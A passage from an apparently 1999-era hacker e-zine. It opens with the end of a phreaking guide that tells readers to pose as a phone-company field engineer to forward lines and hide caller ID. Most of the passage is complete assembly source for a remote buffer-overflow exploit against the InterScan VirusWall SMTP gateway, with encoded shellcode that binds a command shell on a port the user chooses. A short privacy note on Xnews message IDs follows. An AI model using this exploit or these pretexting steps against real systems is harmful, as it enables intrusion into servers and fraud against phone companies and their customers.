in the US, you could be super lame and simply have another US line forwarded
to another number via the means of posing to the forwarded lines co as a
field engineer requesting a line be forwarded to xxx while you carry out
field 'maintanance' on it, _or_ if you wanna stay away from the lameness, you
could so this:
Lets take Indonisia for example. You can remotely forward an Indonisian
residential line to anywhere you want (providing you can find an english
speaking exchange). Indonisia is just an example, but like the US method of
forwarding lines you have 2 options. You could a) pose a local field
engineer, or if the country has a DMS[+] architecture you could forward the
lines via the means of remote switch access. (Thats another file, but you get
the general idea). So, when it comes down to it, its all about having the
ability to route calls, not spoof them.
So, there you have it, a brief guide to CID blocking (the effective way), its
your choice, *67 (blah) or *67,00-->1800XXXXXXX-->*67,00-->1800XXXXXX(CD)-->
KP2-44-141-0800-XXXXXXX-ST -->001-1800XXXXXXX-->*67,00-->555-555-5555 hello?
<click> <click> <churchunk> <brrr> <curchunk> <click> <click> :>
I hope you enjoyed this file as much as I did writing it, take it easy and
remember to check out my website.. :)
Shouts to 9x, substance, downtime, ch1ckie, oclet, jasun, zomba, psyclone,
bodie, digiphreq, w1repa1r, gr1p, t1p, jorge, b4b0, shadowx, osiris, essgurl,
lowtek, pbxphreak, katkilla, drphace, prez, euk, simmeth, dgtlfokus, voltage,
: . http://hybrid.dtmf.org
___ ___ _____.___.____________________ ____________
hybrid@b4b0.org / | \\__ | |\______ \______ \/_ \______ \
hybrid@ninex.com / ~ \/ | | | | _/| _/ | || | \
hybrid@dtmf.org \ Y /\____ | | | \| | \ | || hy_ \
\___|_ / / ______| |______ /|____|_ / |___/_______ /
+++ NO CARRIER \/ \/ : \/ \/ . \/
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: cp850
iQEVAwUBN5dSy7TUyHciIYgJAQGcSgf/er3ngPoYsPon9rmU4VG0klcp9koc5aoA
hBBheVxeeVQOzrUl0kPv5sCUPdHoEKbabHqAyDcoJY9feoM5aZ4U0kryuTBm415z
M57ff31CH+T+8iUaW7ZlQkBfFuJfNr2B3pro6KvDGzU2S7nJhYSCugoCf3IExlLt
+FSXEAl+HC0PCpDcEYlQ+2kNwgOBMLLQ9w3On/vFcRJnD26E9Hk4j5IMv8iv+37F
sdQDDhqQ3ah2y1CN3KGAOrcsaYRhT1OyLjbw+JDwR1buCa38yqawBjpbAuM/PTfU
eoNCmwzFEucjcFKpQJisT1428MgeuK2cWmIj8flfuIr9fhIi/7wdNA==
=570J
-----END PGP SIGNATURE-----
@HWA
45.0 A buffer overflow exists on the VirusWall smtp gateway
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by duro
A buffer overflow exists on the VirusWall smtp gateway - by sending a long
HELO command you can overflow the buffer and execute arbitrary code.
Example code has been written which will spawn a command prompt on a port
you specify.
Before you shrug this one off, take a look:
Connected to mail1.microsoft.com.
Escape character is '^]'.
220 mail1.microsoft.com InterScan VirusWall NT ESMTP 3.23 (build 9/10/99)
ready
at Sun, 07 Nov 1999 03:38:44 -0800 (Pacific Standard Time)
The ironic thing here is, VirusWall was designed to prevent viruses and
'malicious code'.
Obviously not a lot of thought was taken before laying their trust into
3rd party 'security' products.
A quick note to the millions out there who would give their right arm to
compromise microsofts network - sorry, their firewall would prevent the
payload from spawning a remote shell.. unless of course it was modified to
stop an existing service to open a port :)
Exploit source and binary is available at http://www.beavuh.org.
Credit to Liraz Siri for bringing this to our attention.
Hi to eEye/w00w00/teso.
; Interscan VirusWall 3.23/3.3 remote.
;
; The binary is available at http://www.beavuh.org.
;
; To assemble:
;
; tasm32 -ml vwxploit.asm
; tlink32 -Tpe -c -x vwxploit.obj ,,, import32
;
; TASM 5 required!
;
; dark spyrit <dspyrit@beavuh.org>
.386p
locals
jumps
.model flat, stdcall
extrn GetCommandLineA:PROC
extrn GetStdHandle:PROC
extrn WriteConsoleA:PROC
extrn ExitProcess:PROC
extrn WSAStartup:PROC
extrn connect:PROC
extrn send:PROC
extrn recv:PROC
extrn WSACleanup:PROC
extrn gethostbyname:PROC
extrn htons:PROC
extrn socket:PROC
extrn inet_addr:PROC
extrn closesocket:PROC
extrn Sleep:PROC
.data
sploit_length323 equ 1314
sploit323:
db 068h, 065h, 06ch, 06fh, 020h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 0bbh, 010h, 00bh, 011h, 001h, 0c1h, 0ebh
db 002h, 08bh, 0f8h, 033h, 0c0h, 050h, 048h, 090h, 050h, 059h, 0f2h, 0afh
db 059h, 0b1h, 0c6h, 08bh, 0c7h, 048h, 080h, 030h, 099h, 0e2h, 0fah, 033h
db 0f6h, 096h, 090h, 090h, 056h, 0ffh, 013h, 08bh, 0d0h, 0fch, 033h, 0c9h
db 0b1h, 00bh, 049h, 032h, 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 052h, 051h
db 056h, 052h, 066h, 0bbh, 034h, 043h, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h
db 0ech, 032h, 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 066h, 0bbh, 0c4h, 042h
db 056h, 0ffh, 013h, 08bh, 0d0h, 0fch, 033h, 0c9h, 0b1h, 006h, 032h, 0c0h
db 0ach, 084h, 0c0h, 075h, 0f9h, 052h, 051h, 056h, 052h, 066h, 0bbh, 034h
db 043h, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h, 0ech, 083h, 0c6h, 005h, 033h
db 0c0h, 050h, 040h, 050h, 040h, 050h, 0ffh, 057h, 0e8h, 093h, 06ah, 010h
db 056h, 053h, 0ffh, 057h, 0ech, 06ah, 002h, 053h, 0ffh, 057h, 0f0h, 033h
db 0c0h, 057h, 050h, 0b0h, 00ch, 0abh, 058h, 0abh, 040h, 0abh, 05fh, 048h
db 050h, 057h, 056h, 0adh, 056h, 0ffh, 057h, 0c0h, 048h, 050h, 057h, 0adh
db 056h, 0adh, 056h, 0ffh, 057h, 0c0h, 048h, 0b0h, 044h, 089h, 007h, 057h
db 0ffh, 057h, 0c4h, 033h, 0c0h, 08bh, 046h, 0f4h, 089h, 047h, 03ch, 089h
db 047h, 040h, 08bh, 006h, 089h, 047h, 038h, 033h, 0c0h, 066h, 0b8h, 001h
db 001h, 089h, 047h, 02ch, 057h, 057h, 033h, 0c0h, 050h, 050h, 050h, 040h
db 050h, 048h, 050h, 050h, 0adh, 056h, 033h, 0c0h, 050h, 0ffh, 057h, 0c8h
db 0ffh, 076h, 0f0h, 0ffh, 057h, 0cch, 0ffh, 076h, 0fch, 0ffh, 057h, 0cch
db 048h, 050h, 050h, 053h, 0ffh, 057h, 0f4h, 08bh, 0d8h, 033h, 0c0h, 0b4h
db 004h, 050h, 0c1h, 0e8h, 004h, 050h, 0ffh, 057h, 0d4h, 08bh, 0f0h, 033h
db 0c0h, 08bh, 0c8h, 0b5h, 004h, 050h, 050h, 057h, 051h, 050h, 0ffh, 077h
db 0a8h, 0ffh, 057h, 0d0h, 083h, 03fh, 001h, 07ch, 022h, 033h, 0c0h, 050h
db 057h, 0ffh, 037h, 056h, 0ffh, 077h, 0a8h, 0ffh, 057h, 0dch, 00bh, 0c0h
db 074h, 02fh, 033h, 0c0h, 050h, 0ffh, 037h, 056h, 053h, 0ffh, 057h, 0f8h
db 06ah, 050h, 0ffh, 057h, 0e0h, 0ebh, 0c8h, 033h, 0c0h, 050h, 0b4h, 004h
db 050h, 056h, 053h, 0ffh, 057h, 0fch, 057h, 033h, 0c9h, 051h, 050h, 056h
db 0ffh, 077h, 0ach, 0ffh, 057h, 0d8h, 06ah, 050h, 0ffh, 057h, 0e0h, 0ebh
db 0aah, 050h, 0ffh, 057h, 0e4h, 090h, 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h
db 0aah, 0abh, 099h, 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h
db 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h, 0ebh, 0edh, 0ech, 0e9h
db 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h, 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch
db 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 0d8h, 099h, 0dah, 0f5h, 0f6h
db 0eah, 0fch, 0d1h, 0f8h, 0f7h, 0fdh, 0f5h, 0fch, 099h, 0c9h, 0fch, 0fch
db 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh
db 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h, 0f5h, 0f5h, 0f6h, 0fah, 099h, 0ceh
db 0ebh, 0f0h, 0edh, 0fch, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cbh, 0fch, 0f8h
db 0fdh, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h, 0fch, 0fch, 0e9h, 099h
db 0dch, 0e1h, 0f0h, 0edh, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h
db 0ceh, 0cah, 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah, 0f2h
db 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h, 0f5h, 0f0h, 0eah, 0edh
db 0fch, 0f7h, 099h, 0f8h, 0fah, 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch
db 0f7h, 0fdh, 099h, 0ebh, 0fch, 0fah, 0efh, 099h, 09bh, 099h
store dw ?
db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
db 0fah, 0f4h, 0fdh, 0b7h, 0fch, 0e1h, 0fch, 099h, 0ffh, 0ffh, 0ffh, 0ffh
db 060h, 045h, 042h, 000h, 00dh, 00ah
sploit_length33 equ 794
sploit33:
db 068h, 065h, 06ch, 06fh, 020h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 04bh, 08bh
db 0c3h, 0bbh, 001h, 090h, 016h, 001h, 0c1h, 0ebh, 002h, 08bh, 0f8h, 033h
db 0c0h, 050h, 048h, 090h, 050h, 059h, 0f2h, 0afh, 059h, 0b1h, 0c6h, 08bh
db 0c7h, 048h, 080h, 030h, 099h, 0e2h, 0fah, 033h, 0f6h, 096h, 090h, 090h
db 056h, 0ffh, 013h, 08bh, 0d0h, 0fch, 033h, 0c9h, 0b1h, 00bh, 049h, 032h
db 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 052h, 051h, 056h, 052h, 0b3h, 080h
db 090h, 090h, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h, 0ech, 032h, 0c0h, 0ach
db 084h, 0c0h, 075h, 0f9h, 0b3h, 001h, 04bh, 090h, 056h, 0ffh, 013h, 08bh
db 0d0h, 0fch, 033h, 0c9h, 0b1h, 006h, 032h, 0c0h, 0ach, 084h, 0c0h, 075h
db 0f9h, 052h, 051h, 056h, 052h, 0b3h, 080h, 090h, 090h, 0ffh, 013h, 0abh
db 059h, 05ah, 0e2h, 0ech, 083h, 0c6h, 005h, 033h, 0c0h, 050h, 040h, 050h
db 040h, 050h, 0ffh, 057h, 0e8h, 093h, 06ah, 010h, 056h, 053h, 0ffh, 057h
db 0ech, 06ah, 002h, 053h, 0ffh, 057h, 0f0h, 033h, 0c0h, 057h, 050h, 0b0h
db 00ch, 0abh, 058h, 0abh, 040h, 0abh, 05fh, 048h, 050h, 057h, 056h, 0adh
db 056h, 0ffh, 057h, 0c0h, 048h, 050h, 057h, 0adh, 056h, 0adh, 056h, 0ffh
db 057h, 0c0h, 048h, 0b0h, 044h, 089h, 007h, 057h, 0ffh, 057h, 0c4h, 033h
db 0c0h, 08bh, 046h, 0f4h, 089h, 047h, 03ch, 089h, 047h, 040h, 08bh, 006h
db 089h, 047h, 038h, 033h, 0c0h, 066h, 0b8h, 001h, 001h, 089h, 047h, 02ch
db 057h, 057h, 033h, 0c0h, 050h, 050h, 050h, 040h, 050h, 048h, 050h, 050h
db 0adh, 056h, 033h, 0c0h, 050h, 0ffh, 057h, 0c8h, 0ffh, 076h, 0f0h, 0ffh
db 057h, 0cch, 0ffh, 076h, 0fch, 0ffh, 057h, 0cch, 048h, 050h, 050h, 053h
db 0ffh, 057h, 0f4h, 08bh, 0d8h, 033h, 0c0h, 0b4h, 004h, 050h, 0c1h, 0e8h
db 004h, 050h, 0ffh, 057h, 0d4h, 08bh, 0f0h, 033h, 0c0h, 08bh, 0c8h, 0b5h
db 004h, 050h, 050h, 057h, 051h, 050h, 0ffh, 077h, 0a8h, 0ffh, 057h, 0d0h
db 083h, 03fh, 001h, 07ch, 022h, 033h, 0c0h, 050h, 057h, 0ffh, 037h, 056h
db 0ffh, 077h, 0a8h, 0ffh, 057h, 0dch, 00bh, 0c0h, 074h, 02fh, 033h, 0c0h
db 050h, 0ffh, 037h, 056h, 053h, 0ffh, 057h, 0f8h, 06ah, 050h, 0ffh, 057h
db 0e0h, 0ebh, 0c8h, 033h, 0c0h, 050h, 0b4h, 004h, 050h, 056h, 053h, 0ffh
db 057h, 0fch, 057h, 033h, 0c9h, 051h, 050h, 056h, 0ffh, 077h, 0ach, 0ffh
db 057h, 0d8h, 06ah, 050h, 0ffh, 057h, 0e0h, 0ebh, 0aah, 050h, 0ffh, 057h
db 0e4h, 090h, 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h, 0dah
db 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh, 0fch
db 0edh, 0cah, 0edh, 0f8h, 0ebh, 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h
db 0d8h, 099h, 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h, 0fah
db 0fch, 0eah, 0eah, 0d8h, 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h, 0f8h
db 0f7h, 0fdh, 0f5h, 0fch, 099h, 0c9h, 0fch, 0fch, 0f2h, 0d7h, 0f8h, 0f4h
db 0fch, 0fdh, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h
db 0f5h, 0d8h, 0f5h, 0f5h, 0f6h, 0fah, 099h, 0ceh, 0ebh, 0f0h, 0edh, 0fch
db 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cbh, 0fch, 0f8h, 0fdh, 0dfh, 0f0h, 0f5h
db 0fch, 099h, 0cah, 0f5h, 0fch, 0fch, 0e9h, 099h, 0dch, 0e1h, 0f0h, 0edh
db 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h, 0ceh, 0cah, 0d6h, 0dah
db 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h, 0fbh
db 0f0h, 0f7h, 0fdh, 099h, 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h
db 0fah, 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh, 099h, 0ebh
db 0fch, 0fah, 0efh, 099h, 09bh, 099h
store2 dw ?
db 099h, 099h, 099h, 099h
db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 0fah, 0f4h, 0fdh, 0b7h
db 0fch, 0e1h, 0fch, 099h, 0ffh, 0ffh, 0ffh, 0ffh, 009h, 01fh, 040h, 000h
db 00dh, 00ah
logo db "Interscan VirusWall NT 3.23/3.3 remote - http://www.beavuh.org for nfo.", 13, 10
db "by dark spyrit <dspyrit@beavuh.org>",13,10,13,10
db "usage: vwxploit <host> <port> <port to bind shell> <version>", 13, 10
db "eg - vwxploit host.com 25 1234 3.23",13,10,0
logolen equ $-logo
errorinit db 10,"error initializing winsock.", 13, 10, 0
errorinitl equ $-errorinit
derror db 10,"error.",13,10,0
derrorl equ $-derror
nohost db 10,"no host or ip specified.", 13,10,0
nohostl equ $-nohost
noport db 10,"no port specified.",13,10,0
noportl equ $-noport
no_port2 db 10,"no bind port specified.",13,10,0
no_port2l equ $-no_port2
response db 10,"waiting for response....",13,10,0
respl equ $-response
reshost db 10,"error resolving host.",13,10,0
reshostl equ $-reshost
sockerr db 10,"error creating socket.",13,10,0
sockerrl equ $-sockerr
ipill db 10,"ip error.",13,10,0
ipilll equ $-ipill
cnerror db 10,"error establishing connection.",13,10,0
cnerrorl equ $-cnerror
success db 10,"sent.. spawn connection now.",13,10,0
successl equ $-success
verzion db 10,"please specify a valid version.",13,10,0
verzionl equ $-verzion
console_in dd ?
console_out dd ?
bytes_read dd ?
wsadescription_len equ 256
wsasys_status_len equ 128
WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends
sockaddr_in struct
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup (0)
sockaddr_in ends
wsadata WSAdata <?>
sin sockaddr_in <?>
sock dd ?
numbase dd 10
version db 0
_port db 256 dup (?)
_host db 256 dup (?)
_port2 db 256 dup (?)
buffer db 1000 dup (0)
.code
start:
call init_console
push logolen
push offset logo
call write_console
call GetCommandLineA
mov edi, eax
mov ecx, -1
xor al, al
push edi
repnz scasb
not ecx
pop edi
mov al, 20h
repnz scasb
dec ecx
cmp ch, 0ffh
jz @@0
test ecx, ecx
jnz @@1
@@0:
push nohostl
push offset nohost
call write_console
jmp quit3
@@1:
mov esi, edi
lea edi, _host
call parse
or ecx, ecx
jnz @@2
push noportl
push offset noport
call write_console
jmp quit3
@@2:
lea edi, _port
call parse
or ecx, ecx
jnz @@3
push no_port2l
push offset no_port2
call write_console
jmp quit3
@@3:
push ecx
lea edi, _port2
call parse
cmp dword ptr [esi], "32.3"
jz ver1
cmp word ptr [esi+1], "3."
jz ver2
push verzionl
push offset verzion
call write_console
jmp quit3
ver1:
inc version
ver2:
push offset wsadata
push 0101h
call WSAStartup
or eax, eax
jz winsock_found
push errorinitl
push offset errorinit
call write_console
jmp quit3
winsock_found:
xor eax, eax
push eax
inc eax
push eax
inc eax
push eax
call socket
cmp eax, -1
jnz socket_ok
push sockerrl
push offset sockerr
call write_console
jmp quit2
socket_ok:
mov sock, eax
mov sin.sin_family, 2
mov ebx, offset _port
call str2num
mov eax, edx
push eax
call htons
mov sin.sin_port, ax
mov ebx, offset _port2
call str2num
mov eax, edx
push eax
call htons
xor ax, 09999h
mov store, ax
mov store2, ax
mov esi, offset _host
lewp:
xor al, al
lodsb
cmp al, 039h
ja gethost
test al, al
jnz lewp
push offset _host
call inet_addr
cmp eax, -1
jnz ip_aight
push ipilll
push offset ipill
call write_console
jmp quit1
ip_aight:
mov sin.sin_addr, eax
jmp continue
gethost:
push offset _host
call gethostbyname
test eax, eax
jnz gothost
push reshostl
push offset reshost
call write_console
jmp quit1
gothost:
mov eax, [eax+0ch]
mov eax, [eax]
mov eax, [eax]
mov sin.sin_addr, eax
continue:
push size sin
push offset sin
push sock
call connect
or eax, eax
jz connect_ok
push cnerrorl
push offset cnerror
call write_console
jmp quit1
connect_ok:
push respl
push offset response
call write_console
xor eax, eax
push eax
push 1000
push offset buffer
push sock
call recv
or eax, eax
jg sveet
push derrorl
push offset derror
call write_console
jmp quit1
sveet:
push eax
push offset buffer
call write_console
cmp version, 0
jz shell2
xor eax, eax
push eax
push sploit_length323
push offset sploit323
push sock
jmp blah
shell2:
xor eax, eax
push eax
push sploit_length33
push offset sploit33
push sock
blah:
call send
push 500
call Sleep
push successl
push offset success
call write_console
quit1:
push sock
call closesocket
quit2:
call WSACleanup
quit3:
push 0
call ExitProcess
parse proc
;cheap parsing..
lewp9:
xor eax, eax
cld
lodsb
cmp al, 20h
jz done
test al, al
jz done2
stosb
dec ecx
jmp lewp9
done:
dec ecx
done2:
ret
endp
str2num proc
push eax ecx edi
xor eax, eax
xor ecx, ecx
xor edx, edx
xor edi, edi
lewp2:
xor al, al
xlat
test al, al
jz end_it
sub al, 030h
mov cl, al
mov eax, edx
mul numbase
add eax, ecx
mov edx, eax
inc ebx
inc edi
cmp edi, 0ah
jnz lewp2
end_it:
pop edi ecx eax
ret
endp
init_console proc
push -10
call GetStdHandle
or eax, eax
je init_error
mov [console_in], eax
push -11
call GetStdHandle
or eax, eax
je init_error
mov [console_out], eax
ret
init_error:
push 0
call ExitProcess
endp
write_console proc text_out:dword, text_len:dword
pusha
push 0
push offset bytes_read
push text_len
push text_out
push console_out
call WriteConsoleA
popa
ret
endp
end start
knight, siezer, oeb, lusta, infidel, devious, werd to #9x #darkcyde #phunc
#b4b0 #2600 #2600-uk & wErd to D4RKCYDE.
@HWA
46.0 The Xnews guid
~~~~~~~~~~~~~~
From the home page http://xnews.3dnews.net/
All the talks about the PIII's ID code and Win98's Global Unique ID remind
me of Xnews' own IDToken. From the manual: This is a string Xnews embeds
in Message-ID in order to track your posts and alert you to replies to
your articles. You can use any string of letters and numbers. I use my
email without the @ and . luutrangeocities. The idea is to use a string
that noone else is likely to use.
By default, I generate this string by taking your email address and strip
out the . and @. In retrospect, maybe this was not such a good idea as
some users who go through great length to hide their email may not
appreciate having it embedded inside Message-ID and References headers
(albeit in an altered form). But, you can change this to anything you
like, including using a seemingly random string of letters and numbers.
And if you're really paranoid, just delete it (just use empty string).
You'll lose the convenience of having Xnews flag replies to your posts, of
course. [By the way, if your news server does not accept client-generated
message ids, this entire discussion is moot.]
Anyway, I just want Xnews users to be aware of this issue. I don't want
people to be caught by surprise then flaming me. This is really a feature
designed to help you, not some lame corporate
attempt to track you for marketing purposes.
@HWA
47.0 BUFFER OVERFLOW IN IMG VIEWER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
